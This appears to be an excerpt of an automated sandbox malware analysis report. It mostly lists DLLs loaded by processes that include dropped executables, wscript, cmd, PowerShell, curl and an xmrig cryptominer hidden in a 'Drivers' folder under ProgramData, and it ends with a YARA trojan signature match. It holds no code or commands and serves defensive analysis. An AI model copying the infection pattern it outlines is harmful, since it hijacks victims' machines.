Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: iphlpapi.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: userenv.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: powrprof.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: umpdc.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: mswsock.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: dnsapi.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: napinsp.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: pnrpnsp.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: wshbth.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: nlaapi.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: winrnr.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: explorerframe.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: rasadhlp.dll
Source: C:\ProgramData\Drivers\xmrig.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\1.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: cscapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\curl.exe Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe Section loaded: fwpuclnt.dll
Yara signature match
Source: 6.3.6.exe.1b665fa72bc.1.raw.unpack, type: UNPACKEDPE Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
